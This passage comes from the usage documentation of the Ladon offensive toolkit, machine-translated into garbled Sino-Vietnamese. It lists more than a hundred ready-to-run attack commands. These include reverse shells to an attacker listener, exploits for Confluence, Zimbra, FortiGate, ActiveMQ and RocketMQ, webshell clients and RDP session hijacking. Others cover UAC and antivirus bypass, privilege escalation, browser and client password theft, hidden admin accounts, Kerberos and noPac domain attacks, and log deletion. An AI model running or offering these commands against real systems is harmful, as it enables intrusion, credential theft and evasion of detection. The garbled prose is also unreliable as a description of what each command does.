128 bắn ngược TCP CMD & PowerShell Shell
Ladon PowerCat 192.168.1.8 4444 cmd
Ladon PowerCat 192.168.1.8 4444 psh
129 bắn ngược UDP Cmd & PowerShell Shell
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
130 netsh bổn cơ 888 cảng chuyển phát đến 112 22 cảng
Ladon netsh add 888 192.168.1.112 22
131 PortTran cảng chuyển phát (3389 ví dụ )
VPS nghe lén: Ladon PortTran 8000 338
Mục tiêu chuyển phát: Ladon PortTran nội võng IP 3389 VPS_IP 8000
Bổn cơ liên tiếp: mstsc VPS_IP:338

Bổn cơ chấp hành

132 RDP mặt bàn hội thoại bắt cóc ( không cần mật mã )
Ladon RdpHijack 3
Ladon RdpHijack 3 console
133 tăng thêm đăng ký biểu Run khởi động hạng
Ladon RegAuto Test c:\123.exe
134 AT kế hoạch chấp hành trình tự ( không cần thời gian )(system quyền hạn )
Ladon at c:\123.exe
Ladon at c:\123.exe gui
135 SC phục vụ thêm khởi động hạng & chấp hành trình tự (system quyền hạn )
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName

Hệ thống tin tức dò xét

136 Snmp hiệp nghị dò xét thao tác hệ thống, thiết bị chờ tin tức
Ladon 192.168.1.8/24 SnmpInfo
137 Nbt hiệp nghị dò xét Windows trưởng máy danh, vực, người dùng
Ladon 192.168.1.8/24 NbtInfo
138 Smb hiệp nghị dò xét Windows phiên bản, trưởng máy danh, vực
Ladon 192.168.1.8/24 SmbInfo
139 Wmi hiệp nghị dò xét Windows phiên bản, trưởng máy danh, vực
Ladon 192.168.1.8/24 WmiInfo
140 Mssql hiệp nghị dò xét Windows phiên bản, trưởng máy danh, vực
Ladon 192.168.1.8/24 MssqlInfo
141 Winrm hiệp nghị dò xét Windows phiên bản, trưởng máy danh, vực
Ladon 192.168.1.8/24 WinrmInfo
142 Exchange dò xét Windows phiên bản, trưởng máy danh, vực
Ladon 192.168.1.8/24 ExchangeInfo
143 Rdp hiệp nghị dò xét Windows phiên bản, trưởng máy danh, vực
Ladon 192.168.1.8/24 RdpInfo

Cái khác công năng

144 Win2008 một kiện bắt đầu dùng.net 3.5
Ladon EnableDotNet
145 thu hoạch nội trang web điểm HTML nguyên mã
Ladon gethtml http://192.168.1.1
146 một kiện mini WEB server thẩm thấu nghe lén chuyên dụng WEB server
Ladon web 80
Ladon web 80 dir

Thu hoạch ngoại võng IP(VPS thượng khởi động WEB, mục tiêu phỏng vấn ip.txt hoặc ip.jpg) http://192.168.1.8/ip.txt

147 getstr/getb64/debase64/savetxt( vô hồi hiện lỗ hổng hồi hiện kết quả )
Nghe lén
Ladon web 800
Đệ trình phản hồi văn bản rõ ràng
certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456
Base64 mã hóa kết quả
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Base64 kết quả giải mật
certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw
148 Shiro cắm kiện dò xét
Ladon 192.168.1.8/24 IsShiro
149 LogDelTomcat xóa bỏ Tomcat chỉ định IP nhật ký
Ladon LogDelTomcat access.log 192.168.1.8
150 C# tự định nghĩa trình tự tập cắm kiện rà quét
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24*.dll(c#)
151 ReadFile đọc lấy đại văn kiện phía trước chỉ định chiều dài nội dung
Ladon ReadFile c:\k8.exe cam chịu 1k
Ladon ReadFile c:\k8.exe 1K
Ladon ReadFile c:\k8.exe 1024K
Ladon ReadFile c:\k8.exe 1M
152 sửa chữa đăng ký biểu đọc lấy 2012 cập sau hệ thống văn bản rõ ràng mật mã
Ladon SetMzLogonPwd 1
153 sửa chữa đăng ký biểu bắt cóc ký tên thị thực
Ladon SetSignAuth 1
154 IP24 phê lượng IP chuyển thành ip24 cách thức (192.168.1.1/24)
Ladon ip.txt IP24
155 IPC phê lượng IP chuyển thành ip C cách thức (192.168.1.)
Ladon ip.txt IPC
156 IPB phê lượng IP chuyển thành ip B cách thức (192.168.)
Ladon ip.txt IPB
157 lỗ hổng kiểm tra đo lường Atlassian Confluence CVE-2022-26134
Ladon url.txt CVE-2022-26134
158 Atlassian Confluence CVE-2022-26134 EXP
Ladon EXP-2022-26134 https://111.123.123.123 id
159 RevShell-2022-26134 CVE-2022-26134 bắn ngược Shell
Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort
Ladon RevShell-2022-26134 http://xxx:8090 123.123.123.123 4444
160 SslInfo giấy chứng nhận dò xét thiết bị, IP, vực danh, máy móc danh, tổ chức cơ cấu chờ tin tức
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo chỉ định cảng
Ladon noping fbi.gov SslInfo cấm ping dò xét
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
161 SslInfo giấy chứng nhận phê lượng dò xét thiết bị, IP, vực danh, máy móc danh, tổ chức cơ cấu chờ tin tức
Ladon ip.txt SslInfo
Ladon url.txt SslInfo
Ladon 192.168.1.1/c SslInfo
Ladon 192.168.1.1/b SslInfo
162 WPinfo nhiều loại phương pháp thu hoạch WordPress chủ trình tự, chủ đề, cắm kiện phiên bản
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo cấm ping dò xét
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
163 WPinfo phê lượng thu hoạch WordPress chủ trình tự, chủ đề, cắm kiện phiên bản
Ladon ip.txt WPinfo
Ladon url.txt WPinfo
Ladon 192.168.1.1/c WPinfo
Ladon 192.168.1.1/b WPinfo
164 Exchange bạo lực phá giải phân biệt Exchange mật mã bạo phá
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8, 24 ExchangeScan
165 CVE-2022-27925 phê lượng dò xét Zimbra bưu phục ZIP mục lục xuyên qua RCE lỗ hổng
Ladon 192.168.1.8 CVE-2022-27925
Ladon http://zimbra.k8gege.org CVE-2022-27925
Ladon ip.txt CVE-2022-27925
Ladon url.txt CVE-2022-27925
Ladon 192.168.1.1/c CVE-2022-27925
Ladon 192.168.1.1/b CVE-2022-27925
166 EXP-2022-27925 Zimbra bưu phục chưa trao quyền RCE lỗ hổng EXP GetShell
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
167 WebShellCmd liên tiếp jsp WebShell( duy trì cd, k8, ua, uab64)
Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami
JSP UAshell xem xét hệ thống phiên bản, Python, gcc chờ tin tức phương tiện đề quyền
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
168 WebShellCmd liên tiếp jsp WebShell( duy trì cd, k8, ua, uab64)
Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami
169 phi lẫn nhau thức liên tiếp IIS-Raid cửa sau chấp hành mệnh lệnh
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
170 FindIP xứng đôi IP đoạn hay không xuất hiện ở lỗ hổng kết quả trung
Ladon FindIP ipc.txt ISVUL.txt ( chính xác tìm tòi )
Ladon FindIP ipc.txt ISVUL.txt like ( mơ hồ tìm tòi )
171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 bộ định tuyến mật mã đọc lấy
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd phê lượng dò xét Cisco lỗ hổng cũng đạo ra người dùng mật mã
172 PrinterPoc máy in PJL tùy ý số hiệu chấp hành lỗ hổng phê lượng kiểm tra đo lường
Ladon 192.168.1.8 PrinterPoc
Ladon ip.txt PrinterPoc
Cấm ping máy móc rà quét sử dụng noping
Ladon noping 192.168.1.8 PrinterPoc
Ladon noping ip.txt PrinterPoc
173 thông qua Mac tuần tra chế tạo thương (Ladon Mac MAC địa chỉ )
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
174 Cisco VPN bộ định tuyến mật mã bạo phá ( nội trí cam chịu mật mã, duy trì văn bản rõ ràng, Hash)
Ladon 192.168.1.8/24 CiscoScan
Ladon https://192.168.1.8 CiscoScan
Ladon ip.txt CiscoScan
Ladon url.txt CiscoScan​
175 vsFTPdPoc CVE-2011-2523 vsftpd 2.3.4 gương mặt tươi cười cửa sau lỗ hổng kiểm tra đo lường 10.9 di trừ
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc
176 WpScan WordPress mật mã thẩm kế, nhược khẩu lệnh
Ladon http://192.168.1.8 WpScan
Ladon url.txt WpScan
Ladon 192.168.1.8/24 WpScan http rà quét IP khi tăng thêm http://
177 dò xét Exchange phiên bản
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
178 Exchange cao nguy RCE lỗ hổng kiểm tra đo lường
Ladon https://192.168.1.8 ExchangePoc
179 Http/S thu hoạch trang web phản hồi đầu tin tức
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http rà quét IP khi tăng thêm http://
Ladon ip.txt GetHead https rà quét IP khi tăng thêm https://
180 Http/S thu hoạch trang web phản hồi đầu tin tức + nguyên mã
Ladon https://192.168.1.8 GetHtml
Ladon ip.txt GetHtml
Ladon 192.168.1.8/24 GetHtml http
Ladon ip.txt GetHtml https rà quét IP khi tăng thêm https://
181 Http/S thu hoạch trang web trung vực danh
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https rà quét IP khi tăng thêm https://
182 TrueIP vòng qua CDN thu hoạch vực danh chân thật IP( nhưng dùng vực danh, tiêu đề, Banner chờ duy nhất mấu chốt tự đặc thù )
Ladon ip.txt TrueIP k8gege.org
Ladon 192.168.1.8/24 TrueIP k8gege.org
Ladon ip.txt TrueIP"K8 ca ca"
Ladon 192.168.1.8/24 TrueIP"K8 ca ca"

image

183 Firefox mật mã \Cookie\ lịch sử ký lục đọc lấy
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
184 BypassUAC11 vô hồi hiện duy trì Win7, Win8, Win11 Win2012\2016\2019 chờ 10.8 phiên bản di trừ
Ladon40 BypassUAC11 cmd
Ladon40 BypassUAC11 c:\1.bat
Ladon40 BypassUAC11 c:\1.exe
185 GetPwd duy trì Navicat, TeamView, Xshell, SecureCRT mật mã đọc lấy
Ladon GetPwd
186 DraytekScan mật mã thẩm kế Draytek nhược khẩu lệnh kiểm tra đo lường
Ladon 192.168.1.8 DraytekScan
Ladon https://192.168.1.8 DraytekScan
Ladon 192.168.1.8/24 DraytekScan
Ladon url.txt DraytekScan
187 XshellPwd Xshell mật mã đọc lấy
Ladon XshellPwd
188 FortiGate CVE-2022-40684 chưa trao quyền viết SSH-KEY admin admin123
Ladon 192.168.1.8 CVE-2022-40684
Ladon https://192.168.1.8 CVE-2022-40684
Ladon 192.168.1.8/24 CVE-2022-40684
Ladon url.txt CVE-2022-40684
189 MssqlCmd SQL Server viễn trình chấp hành mệnh lệnh SQL phiên bản, OS tin tức xp_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
190 MssqlCmd SQL Server viễn trình chấp hành mệnh lệnh efspotato, badpotato đề quyền
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami
191 CVE-2018-14847 Mikrotik RouterOS 6.29-6.42 phiên bản mật mã đọc lấy
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
192 ZteScan trung hưng bộ định tuyến quang miêu Web cam chịu khẩu lệnh kiểm tra đo lường
Ladon 192.168.1.8 ZteScan
Ladon ip.txt ZteScan
Ladon http://192.168.1.8 ZteScan
Ladon url.txt ZteScan
193 MSNSwitchPwd CVE-2022-32429 MSNSwitch bộ định tuyến mật mã đọc lấy
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd
194 NetGearPwd NetGear DGND3700v2 bộ định tuyến mật mã đọc lấy
Ladon https://192.168.1.8 NetGearPwd
Ladon url.txt NetGearPwd
195 T3 hiệp nghị dò xét WebLogic phiên bản
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info

Một kiện thẩm thấu InfoScan AllScan PocScan ExpScan VerScan

image

196 InfoScan nhiều mô khối dò xét hệ thống tin tức
Ladon 192.168.1.8/24 InfoScan
Ladon 192.168.1.8 InfoScan
Ladon ip.txt InfoScan
197 VulScan PocScan nhiều viễn trình lỗ hổng kiểm tra đo lường
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
198 ExpScan nhiều lỗ hổng lợi dụng GetShell
Ladon 192.168.1.8/24 ExpScan
Ladon 192.168.1.8 ExpScan
Ladon http://192.168.1.8 ExpScan
199 JoomlaPwd CVE-2023-23752 chưa trao quyền trang web cơ sở dữ liệu mật mã đọc lấy
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
200 AllScan sở hữu mô khối
Ladon 192.168.1.8/24 AllScan
Ladon 192.168.1.8 AllScan
Ladon http://192.168.1.8 AllScan
201 dò xét Citrix Gateway phiên bản
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
202 dò xét Vmware Vcenter phiên bản
Ladon https://192.168.1.8 VmwareVer
Ladon 192.168.1.8/24 VmwareVer
Ladon url.txt VcenterVer
203 vòng qua Defender chấp hành PowerShell
Ladon RunPS -f hello.ps1
Ladon RunPS -c"echo test"
Ladon RunPS bypass
Ladon RunPS default
204 SNMP khởi động lại HP máy in
Ladon HPreboot 192.168.1.8
Ladon HPreboot 192.168.1.8 public
205 rửa sạch thao tác nhật ký cấm dùng.NET nhật ký ký lục
Ladon Clslog
206 ARP hiệp nghị dò xét tồn tại trưởng máy
Ladon 192.168.1.8 ArpInfo
Ladon 192.168.1.8/24 ArpInfo
207 mini FTP server, ( duy trì windows/Linux tự mang ftp mệnh lệnh thực hiện văn kiện thượng truyền xuống tái )
Ladon FtpServer 21
Ladon Ftp 2121
Ladon Ftp 2121 admin admin
208 nghe lén TCP phát bao số liệu bảo tồn TXT cùng HEX như SMB RDP HTTP SSH LDAP FTP chờ hiệp nghị
Ladon Tcp 8080
Ladon TcpServer 80
209 nghe lén UDP phát bao số liệu bảo tồn TXT cùng HEX như DNS, SNMP chờ hiệp nghị
Ladon UdpServer 8080
Ladon Udp 161
210 PortForward cảng chuyển phát cảng trung chuyển
Ladon PortForward<localPort><targetHost><targetPort>
Example:
Ladon PortForward 338 192.168.1.8 3389
Test: mstsc 127.0.0.1 338
211 CVE-2022-36537 Server Backup Manager chưa trao quyền RCE lỗ hổng kiểm tra đo lường (Zookeeper)
Ladon https://192.168.1.8 CVE-2022-36537
Ladon 192.168.1.8/24 CVE-2022-36537
Ladon url.txt CVE-2022-36537
212 EXP-2022-36537 Zookeeper chưa trao quyền văn kiện đọc lấy EXP ( cam chịu /WEB-INF/web.xml)
Ladon EXP-2022-36537 url
Ladon EXP-2022-36537 url /WEB-INF/web.xml
213 hoàn toàn đóng cửa SMB, cấm dùng 445 ngăn cản 0day, nằm ngang di động, trung kế công kích chờ
Ladon CloseSMB
214 cấm dùng chỉ định phục vụ
Ladon DisService Spooler
Ladon DisableService Spooler
215 đình chỉ chỉ định phục vụ
Ladon StopService Spooler
216 cho đi cảng mở ra cảng
Ladon OpenTCP 445
Ladon OpenUDP 161
217 ngăn cản cảng chặn lại cảng
Ladon CloseTCP 445
Ladon CloseUDP 161
218 RunToken phục chế lệnh bài chấp hành trình tự
Ladon RunToken explorer cmd.exe
Ladon RunToken explorer c:\1.bat
219 RunSystem đề quyền quản lý viên quyền hạn tăng lên đến SYSTEM quyền hạn
Ladon RunSystem cmd.exe
Ladon RunUser cmd.exe
Ladon RunSystem c:\1.exe
220 RunUser hàng quyền System quyền hạn giáng đến người dùng chấp hành trình tự
Ladon RunUser cmd.exe
Ladon RunUser c:\1.exe
221 GodPotato đề quyền Win8-Win11 Win2012-Win2022
Ladon GodPotato whoami
222 hikvision hải khang uy coi mật mã thẩm kế
Ladon 192.168.1.8/24 HikvisionScan
Ladon http://192.168.1.8:8080 HikvisionScan
Ladon url.txt HikvisionScan
223 hikvision hải khang uy coi CVE-2017-7921 lỗ hổng kiểm tra đo lường
Ladon 192.168.1.8/24 HikvisionPoc
Ladon http://192.168.1.8:8080 HikvisionPoc
Ladon url.txt HikvisionPoc
224 hikvision hải khang uy coi phối trí văn kiện giải mật
Ladon HikvisionDecode configurationFile
225 Ladon thí nghiệm chuyên dụng CmdShell
Ladon web 800 cmd
226 liên tiếp thí nghiệm chuyên dụng CmdShell
Ladon cmdshell http://192.168.50.2:888 cmd whoami
Trình duyệt phỏng vấn http://192.168.1.8:800/shell?cmd=whoami
227 xem xét vực quản lý viên
Ladon QueryAdminDomain
228 xem xét vực tin tức
Ladon QueryDomain
229 Mndp hiệp nghị quảng bá dò xét cùng võng đoạn Mikrotik bộ định tuyến tin tức
Ladon MndpInfo
Ladon RouterOS
Ladon Mikrotik
230 PostShell liên tiếp công cụ, duy trì tự định nghĩa HTTP đầu đệ trình
Ladon PostShell<method><url><pwd><type><cmd>
Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami
Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p
Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p
Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami
Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p
Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p
Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami
Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p
Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p
Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami
Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p
Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p
Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami
Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p
Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p
Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami
Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p
Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p
231 RunCmd/Cmd chấp hành Cmd mệnh lệnh / duy trì b64cmd
Ladon cmd whoami
Ladon b64cmd d2hvYW1p
232 xem xét quản lý viên IP, một kiện đọc lấy đổ bộ thành công nhật ký 4624
Ladon LoginLog
Ladon EventLog
233 Apache RocketMQ CVE-2023-33246 viễn trình mệnh lệnh chấp hành lỗ hổng EXP
Ladon RocketMQexp<ip>10911<command>
Ladon RocketMQexp 192.168.1.8 10911"wget http://192.168.1.8/isvul"
234 Ladon một kiện miễn sát công cụ
Ladon BypassAV py xor anyNet.exe
235 Win11/2022 hệ thống đề quyền đến system quyền hạn
Ladon McpPotato whoami
236 EXE chuyển HEX, CMD mệnh lệnh viết nhập văn kiện
Ladon Exe2Hex 1.exe
237 EXE chuyển Base64, CMD mệnh lệnh viết nhập văn kiện
Ladon Exe2B64 1.exe
238 ZimbraVer Zimbra bưu kiện hệ thống phiên bản dò xét
Ladon 192.168.1.8/24 ZimbraVer
Ladon http://192.168.1.8:8080 ZimbraVer
Ladon url.txt ZimbraVer
239 SharpGPO vực thẩm thấu tổ sách lược nằm ngang di động công cụ
Ladon SharpGPO

Ladon SharpGPO --Action GetOU
Ladon SharpGPO --Action GetOU --OUName"IT Support"

Ladon SharpGPO --Action NewOU --OUName"IT Support"
Ladon SharpGPO --Action NewOU --OUName"App Dev"--BaseDN"OU=IT Support,DC=testad,DC=com"

Ladon SharpGPO --Action MoveObject --SrcDN"CN=user01,CN=Users,DC=testad,DC=com"--DstDN"OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN"CN=user01,OU=IT Support,DC=testad,DC=com"--DstDN"CN=Users,DC=testad,DC=com"

Ladon SharpGPO --Action RemoveOU --OUName"IT Support"
Ladon SharpGPO --Action RemoveOU --DN"OU=IT Support,DC=testad,DC=com"


Ladon SharpGPO --Action GetGPO
Ladon SharpGPO --Action GetGPO --GPOName testgpo

Ladon SharpGPO --Action NewGPO --GPOName testgpo

Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetGPLink
Ladon SharpGPO --Action GetGPLink --DN"OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPLink --GPOName testgpo
Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewGPLink --DN"OU=IT Support,DC=testad,DC=com"--GPOName testgpo
Ladon SharpGPO --Action NewGPLink --DN"OU=IT Support,DC=testad,DC=com"--GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action RemoveGPLink --DN"OU=IT Support,DC=testad,DC=com"--GPOName testgpo
Ladon SharpGPO --Action RemoveGPLink --DN"OU=IT Support,DC=testad,DC=com"--GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup"Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount"Authenticated Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup"Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount"Authenticated Users"

Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup"Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount"Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup"Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount"Authenticated Users"
240 IIS trang web tin tức một kiện thu hoạch
Ladon IisInfo
241 thẩm thấu chuyên dụng WEB server LDAP phản danh sách hóa
Ladon web 800 ldap=192.168.1.8:800
242 thẩm thấu chuyên dụng WEB server RMI phản danh sách hóa
Ladon web 800 rmi=192.168.1.8
243 API tăng thêm quản lý viên ( làm lơ hệ thống net, net1 cấm dùng )
Ladon AddAdmin admin$ 123456
244 API tăng thêm người dùng ( làm lơ hệ thống net, net1.exe cấm dùng )
Ladon AddUser admin$ 123456
245 API xóa bỏ người dùng ( làm lơ hệ thống net, net1.exe cấm dùng )
Ladon DelUser admin$
246 Rubeus vực thẩm thấu Kerberos công kích

Tỷ như TGT thỉnh cầu /ST thỉnh cầu /AS-REP Roasting/Kerberoasting/ cắt cử công kích / hoàng kim phiếu định mức / bạc trắng phiếu định mức / kim cương phiếu định mức / ngọc bích phiếu định mức chờ

Ladon Rubeus
247 noPac vực thẩm thấu vực nội đề quyền CVE-2021-42287/CVE-2021-42278
CVE-2021-42287/CVE-2021-42278 Scanner&Exploiter

/domain /user /pass argument neededforscanning
/dc /mAccount /nPassword argument neededforexploitation

Examples:
Ladon.exe noPac scan -domain htb.local -user domain_user -pass'Password123!'
Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
Ladon.exe noPac -domain htb.local -user domain_user -pass'Password123!'/dc dc02.htb.local /mAccount demo /mPassword Password123!
Ladon.exe noPac -domain htb.local -user domain_user -pass'Password123!'/dc dc02.htb.local /mAccount demo123 /mPassword Password123!/service cifs /ptt
248 SharpGPOAbuse
Ladon SharpGPOAbuse
249 SharpSphere cùng vCenter quản lý giả thuyết cơ khách thao tác hệ thống tiến hành lẫn nhau chấp hành mệnh lệnh
Ladon SharpSphere

No verb selected.

dump Snapshot and download memory dump file

list List all VMs managed by this vCenter

execute Execute givencommandintarget VM

c2 Run C2 using C3's VMwareShareFile module

upload Upload file to target VM

download Download file from target VM

help Display more information on a specific command.

version Display version information.
250 Dcom viễn trình chấp hành mệnh lệnh chi MMC20
Ladon MmcExec host cmdline
Ladon MmcExec 127.0.0.1 calc
Ladon MmcExec 127.0.0.1 Y2FsYw==
251 Dcom viễn trình chấp hành mệnh lệnh chi ShellWindows
Ladon ShellExec host cmdline
Ladon ShellExec 127.0.0.1 calc
Ladon ShellExec 127.0.0.1 Y2FsYw==
252 Dcom viễn trình chấp hành mệnh lệnh chi ShellBrowserWindow
Ladon ShellBrowserExec host cmdline
Ladon ShellBrowserExec 127.0.0.1 calc
Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==
253 Smtp Ntlm dò xét hệ thống tin tức (25, 465, 587 cảng )
Ladon 192.168.1.8/24 SmtpInfo
254 HTTP/S Ntlm dò xét hệ thống tin tức
Ladon 192.168.1.8/24 HttpInfo
255 ActiveMQ CVE-2023-46604 RCE Exploit
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
256 DomainLog DomainUserIP viễn trình tuần tra vực người dùng IP
Ladon DomainLog -d 7
Ladon DomainLog -h ip -d 7
Ladon DomainLog -h ip -d 7 -grep user
Ladon DomainLog -h ip -u username -p password -d 7
Ladon DomainLog -h ip -u username -p password -d 7 -all
Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\path\res
ult.txt
257 kiểm tra đo lường người dùng hay không Lotus quản lý viên
Ladon LotusAdmin http://192.168.1.1
Ladon LotusAdmin http://192.168.1.1/adm.nsf
258 HTA server một kiện khởi động phỏng vấn DOC cũng có thể chấp hành HTA
Ladon HtaSer
Ladon HtaSer 8080
259 ConfVer ConfluenceVer dò xét Confluence phiên bản
Ladon 192.168.1.8/24 ConfVer
Ladon http://192.168.1.8:8080 ConfVer
Ladon url.txt ConfVer
260 FindAD nhưng dùng cho tra tìm hoạt động mục lục người dùng đổ bộ vị trí, cái cử vực người dùng
Ladon FindAD<parameters>
Ladon pveFindADUser<parameters>
261 Oracle cơ sở dữ liệu viễn trình đề quyền công cụ phía chính phủ điều khiển >=.net 4.8
Ladon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami
262 Oracle cơ sở dữ liệu viễn trình đề quyền công cụ 3 loại phương pháp một kiện đề quyền
Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami
Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami
Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami

=======================================================

Example

http://k8gege.org/Ladon/example-en.html

Latest version

Latest version in small seal ring:http://k8gege.org/Ladon/update.txt

Stargazers over time

Stargazers over time

About

